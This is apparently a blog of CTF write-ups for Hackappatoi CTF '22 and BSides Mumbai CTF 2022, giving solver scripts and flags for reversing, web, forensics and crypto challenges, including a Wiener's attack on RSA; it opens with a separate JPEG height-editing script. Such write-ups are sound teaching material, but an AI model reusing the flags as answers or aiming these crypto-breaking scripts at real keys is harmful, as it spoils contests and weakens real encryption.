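#!/usr/bin/env python3
# Added example: locate and edit the height field of a JPEG's SOF segment.
import struct

# Start-of-frame markers (0xC4 DHT, 0xC8 JPG and 0xCC DAC are not frames).
SOF_MARKERS = {0xC0, 0xC1, 0xC2, 0xC3, 0xC5, 0xC6, 0xC7,
               0xC9, 0xCA, 0xCB, 0xCD, 0xCE, 0xCF}
STANDALONE = {0x01, 0xD8, 0xD9} | set(range(0xD0, 0xD8))  # no length field


def find_sof(data):
    """Return (offset of height field, height, width) for the first SOFn."""
    if data[:2] != b"\xff\xd8":
        raise ValueError("missing SOI marker, not a JPEG")
    pos = 2
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos:#x}")
        marker = data[pos + 1]
        if marker == 0xFF:               # fill byte before a marker
            pos += 1
            continue
        if marker in STANDALONE:
            pos += 2
            continue
        (seg_len,) = struct.unpack(">H", data[pos + 2:pos + 4])
        if marker in SOF_MARKERS:
            # Layout: FF Cn | length(2) | precision(1) | height(2) | width(2)
            h_off = pos + 5
            if h_off + 4 > len(data):
                raise ValueError("truncated SOF segment")
            height, width = struct.unpack(">HH", data[h_off:h_off + 4])
            return h_off, height, width
        if marker == 0xDA:               # SOS: compressed data follows
            break
        pos += 2 + seg_len
    raise ValueError("no SOF segment found")


def set_height(data, new_height):
    """Return a copy of the JPEG with the declared height replaced."""
    if not 0 < new_height <= 0xFFFF:
        raise ValueError("height must fit in 16 bits")
    h_off, _, _ = find_sof(data)
    return data[:h_off] + struct.pack(">H", new_height) + data[h_off + 2:]


def build_sample():
    """Constructed header-only JPEG whose height field sits at 0xb0."""
    soi = b"\xff\xd8"
    app0 = (b"\xff\xe0" + struct.pack(">H", 16)
            + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00")
    com = b"\xff\xfe" + struct.pack(">H", 149) + b"x" * 147   # padding
    sof0 = (b"\xff\xc0" + struct.pack(">HBHHB", 17, 8, 442, 640, 3)
            + bytes([1, 0x22, 0, 2, 0x11, 1, 3, 0x11, 1]))
    return soi + app0 + com + sof0 + b"\xff\xd9"


SAMPLE = build_sample()

if __name__ == "__main__":
    off, h, w = find_sof(SAMPLE)
    print(f"height field at {off:#x}: {w}x{h}")
    patched = set_height(SAMPLE, 1000)
    print(patched[off:off + 2].hex(), find_sof(patched)[1:])
```

A declared height smaller than the scan data actually encodes is worth checking for during image triage, since viewers simply crop whatever lies below it.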

Sanity rev (Reverse)

$ strings sanityrev | grep hctf{
hctf{It_h4s_b33N_345Y}
hctf{It_h4s_b33N_345Y}

eXclusive club (Reverse)

Decompile with Ghidra.

undefined8 main(void)

{
  int iVar1;
  undefined8 uVar2;
  size_t sVar3;
  long in_FS_OFFSET;
  char local_28 [24];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  printf("Welcome to our eXclusive club.\nType your password to join us.\n>");
  __isoc99_scanf(&DAT_00102048,local_28);
  uVar2 = obfuscation(local_28);
  sVar3 = strlen(local_28);
  iVar1 = check_access(uVar2,sVar3 & 0xffffffff);
  if (iVar1 == 0) {
    puts("You can\'t join us this time...");
  }
  else {
    puts("Access granted, bro!");
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return 0;
}

void * obfuscation(char *param_1)

{
  size_t sVar1;
  void *pvVar2;
  int local_28;
  
  sVar1 = strlen(param_1);
  pvVar2 = malloc(sVar1 << 2);
  local_28 = 0;
  while( true ) {
    sVar1 = strlen(param_1);
    if (sVar1 <= (ulong)(long)local_28) break;
    *(uint *)((long)pvVar2 + (long)local_28 * 4) = (int)param_1[local_28] ^ 0x41;
    local_28 = local_28 + 1;
  }
  return pvVar2;
}

int check_access(long param_1,int param_2)

{
  int iVar1;
  long in_FS_OFFSET;
  int local_7c;
  int local_78 [26];
  long local_10;
  
  local_10 = *(long *)(in_FS_OFFSET + 0x28);
  iVar1 = 0;
  local_78[0] = 0x29;
  local_78[1] = 0x22;
  local_78[2] = 0x35;
  local_78[3] = 0x27;
  local_78[4] = 0x3a;
  local_78[5] = 0x24;
  local_78[6] = 0x19;
  local_78[7] = 0x22;
  local_78[8] = 0x2d;
  local_78[9] = 0x14;
  local_78[10] = 0x74;
  local_78[11] = 0x70;
  local_78[12] = 0x37;
  local_78[13] = 0x72;
  local_78[14] = 0x1e;
  local_78[15] = 0x71;
  local_78[16] = 0x33;
  local_78[17] = 0x1f;
  local_78[18] = 0xf;
  local_78[19] = 0x71;
  local_78[20] = 0x35;
  local_78[21] = 0x7e;
  local_78[22] = 0x3c;
  if (param_2 == 0x17) {
    for (local_7c = 0; local_7c < 0x17; local_7c = local_7c + 1) {
      iVar1 = local_78[local_7c];
      if (*(int *)(param_1 + (long)local_7c * 4) != iVar1) {
        iVar1 = 0;
        break;
      }
      if (local_7c == 0x16) {
        iVar1 = 1;
        break;
      }
    }
  }
  else {
    iVar1 = 0;
  }
  if (local_10 != *(long *)(in_FS_OFFSET + 0x28)) {
                    /* WARNING: Subroutine does not return */
    __stack_chk_fail();
  }
  return iVar1;
}

The XOR of each input character with 0x41 must match local_78[i].

#!/usr/bin/env python3
enc = [0x29, 0x22, 0x35, 0x27, 0x3a, 0x24, 0x19, 0x22, 0x2d, 0x14, 0x74, 0x70,
    0x37, 0x72, 0x1e, 0x71, 0x33, 0x1f, 0xf, 0x71, 0x35, 0x7e, 0x3c]

flag = ''
for c in enc:
    flag += chr(c ^ 0x41)
print(flag)
hctf{eXclU51v3_0r^N0t?}

Hackappa_rev (Reverse)

Decompile with Ghidra.
The part of the code that looks important is shown below.

int decrypt(EVP_PKEY_CTX *ctx,uchar *out,size_t *outlen,uchar *in,size_t inlen)

{
  undefined8 local_28;
  undefined8 local_20;
  undefined local_18;
  int local_c;
  
  local_28 = 0x627d367e4957464b;
  local_20 = 0x3655626e71787547;
  local_18 = 0x79;
  printf("%s",&local_28);
  for (local_c = 0; (local_c < 100 && (*(char *)((long)&local_28 + (long)local_c) != '\0'));
      local_c = local_c + 1) {
    *(char *)((long)&local_28 + (long)local_c) = *(char *)((long)&local_28 + (long)local_c) + -3;
  }
  printf("%s}\n",&local_28);
  return 0;
}

Subtract 3 from each byte starting at local_28.

#!/usr/bin/env python3
c0 = 0x627d367e4957464b
c1 = 0x3655626e71787547
c2 = 0x79

flag = ''
c0 = c0.to_bytes(8, 'little')
for c in c0:
    flag += chr(c - 3)
c1 = c1.to_bytes(8, 'little')
for c in c1:
    flag += chr(c - 3)
c2 = c2.to_bytes(1, 'little')
for c in c2:
    flag += chr(c - 3)
flag += '}'
print(flag)
HCTF{3z_Drunk_R3v}

Welcome To Web(ere) (Web)

Looking at the HTML source, there is a fragment of the flag in a comment.

<!-- hctf{th3_good_0l_ -->

The linked main.css also has another fragment of the flag in a comment.

/* t1mes_wh3n_si7es*/

Finally, the linked main.js has another fragment of the flag in a comment.

// _wer3_st4tic}

Joining the fragments found gives the flag.

hctf{th3_good_0l_t1mes_wh3n_si7es_wer3_st4tic}

Hidden cocktails (Forensic)

Extracting the rar file gives Books, Documents, and images folders, each containing several files. Since this is a rar file, check whether it contains any alternate data streams.

D:\CTF\work>cd Stuff

D:\CTF\work\Stuff>dir /r
 ドライブ D のボリューム ラベルは DATA です
 ボリューム シリアル番号は CC27-65B0 です

 D:\CTF\work\Stuff のディレクトリ

2022/12/11  19:37    <DIR>          .
2022/12/11  19:37    <DIR>          ..
2022/11/08  22:33    <DIR>          Books
                                 40 Books:spritz_4_life.txt:$DATA
2022/11/08  20:20    <DIR>          Documents
2022/11/08  20:16    <DIR>          images
               0 個のファイル                   0 バイト
               5 個のディレクトリ  164,108,300,288 バイトの空き領域

D:\CTF\work\Stuff>more < Books:spritz_4_life.txt:$DATA
hctf{4lt3rn4t3_D4t4_Str34m_G0n3_W1ld}
hctf{4lt3rn4t3_D4t4_Str34m_G0n3_W1ld}

Hackappatoi CTF '22 Feedback form (SPECIAL)

After I answered the survey, the flag was displayed.

HCTF{Hackappatoi_l0v3s_y0u_4ll_<3}

BSides Mumbai CTF 2022 Writeup

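This competition was held from 2022/12/10 20:00 (JST) to 2022/12/11 20:00 (JST).
I took part with my team again. We scored 1905 points and placed 14th out of 251 teams.
Here are writeups for the challenges I solved myself.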

Welcome To BSides Mumbai CTF (Welcome)

The flag was written in the challenge description.

BSMumbai{W3lcome_T0_BSides_Mumbai_CTF_2022}

Warmup (Reverse)

The ASCII code at each index is compared.
For example, in the block below, the character at index 28 is compared with 55.

10:                                               ; preds = %0
  %11 = getelementptr inbounds [100 x i8], [100 x i8]* %2, i64 0, i64 28
  %12 = load i8, i8* %11, align 4
  %13 = sext i8 %12 to i32
  %14 = icmp eq i32 %13, 55
  br i1 %14, label %15, label %207

Set each character at its index position and join them in order to get the flag.

>>> flag = [''] * 39
>>> flag[28] = chr(55)
>>> flag[30] = chr(110)
>>> flag[29] = chr(49)
>>> flag[36] = chr(53)
>>> flag[13] = chr(121)
>>> flag[18] = chr(95)
>>> flag[2] = chr(77)
>>> flag[15] = chr(51)
>>> flag[34] = chr(48)
>>> flag[7] = chr(48)
>>> flag[24] = chr(102)
>>> flag[17] = chr(102)
>>> flag[26] = chr(48)
>>> flag[25] = chr(49)
>>> flag[10] = chr(100)
>>> flag[27] = chr(52)
>>> flag[3] = chr(123)
>>> flag[23] = chr(95)
>>> flag[19] = chr(49)
>>> flag[21] = chr(95)
>>> flag[31] = chr(57)
>>> flag[8] = chr(117)
>>> flag[37] = chr(51)
>>> flag[11] = chr(95)
>>> flag[33] = chr(104)
>>> flag[1] = chr(83)
>>> flag[0] = chr(66)
>>> flag[22] = chr(52)
>>> flag[32] = chr(95)
>>> flag[16] = chr(49)
>>> flag[12] = chr(109)
>>> flag[38] = chr(125)
>>> flag[35] = chr(117)
>>> flag[6] = chr(102)
>>> flag[9] = chr(110)
>>> flag[14] = chr(53)
>>> flag[4] = chr(49)
>>> flag[5] = chr(95)
>>> flag[20] = chr(110)
>>> ''.join(flag)
'BSM{1_f0und_my531f_1n_4_f10471n9_h0u53}'
BSM{1_f0und_my531f_1n_4_f10471n9_h0u53}

Poet Xor (Crypto)

The cipher uses an 8-byte XOR key. Since we can guess that the flag starts with "BSMumbai" and is on the last line, recover the key from that and decrypt.

#!/usr/bin/env python3
from itertools import cycle

with open('flag.enc', 'rb') as f:
    cipher = f.read().splitlines()

flag_head = b'BSMumbai'

key = b''
last_line = bytes.fromhex(cipher[-1].decode())
for i in range(len(flag_head)):
    key += bytes([flag_head[i] ^ last_line[i]])

for h_ct in cipher:
    ct = bytes.fromhex(h_ct.decode())
    msg = bytes([a ^ b for a, b in zip(ct, cycle(key))]).decode()
    print(msg)

The decrypted message is as follows.

Two bits meet, each with its own
One zero, one one, they are shown
Together they combine, with a XOR
A new value is formed, never a bore.
BSMumbai{w0w_1t_1s_4_fl4g_1n_th3_3nd}
BSMumbai{w0w_1t_1s_4_fl4g_1n_th3_3nd}

Big RSA (Crypto)

e is large (which suggests a small private exponent d), so decrypt with Wiener's Attack.

#!/usr/bin/env sage
from Crypto.Util.number import *
from Crypto.PublicKey import RSA
from Crypto.Cipher import PKCS1_v1_5

def wiener(e, n):
    m = 12345
    c = pow(m, e, n)
    q0 = 1

    list1 = continued_fraction(Integer(e)/Integer(n))
    conv = list1.convergents()
    for i in conv:
        k = i.numerator()
        q1 = i.denominator()

        for r in range(30):
            for s in range(30):
                d = r*q1 + s*q0
                m1 = pow(c, d, n)
                if m1 == m:
                    return d
        q0 = q1
    return None

with open('pubkey.pem', 'r') as f:
    pub_data = f.read()

with open('flag.enc', 'r') as f:
    enc = bytes.fromhex(f.read())

pubkey = RSA.importKey(pub_data)
n = pubkey.n
e = pubkey.e

d = int(wiener(e, n))
key = RSA.construct((n, e, d))
cipher_rsa = PKCS1_v1_5.new(key)

from Crypto.Random import get_random_bytes
sentinel = get_random_bytes(16)
FLAG = cipher_rsa.decrypt(enc, sentinel).rstrip().decode()
print(FLAG)
BSMumbai{RSA_with_bigE}

EggLamal (Crypto)

The following equations are given.

g = 2
m = FLAG % p
A = pow(g, a, p)
B = pow(g, b, p)
s = pow(A, b, p)
c = s * m % p

Here p, A, B, and c are known, while a and b are unknown. Since B has the same value as p - 1, the following holds.

b = (p - 1) // 2

This lets us compute s; from s and c we then compute m and obtain the flag.

#!/usr/bin/env python3
from Crypto.Util.number import *
with open('params.txt', 'r') as f:
    params = f.read().splitlines()

p = int(params[0].split(' ')[-1])
A = int(params[1].split(' ')[-1])
B = int(params[2].split(' ')[-1])
c = int(params[3].split(' ')[-1])
assert B == p - 1

g = 2
b = (p - 1) // 2
s = pow(A, b, p)
m = (c * inverse(s, p)) % p
FLAG = long_to_bytes(m).decode()
print(FLAG)
BSMumbai{ElGamal_Publickey_Cryptography}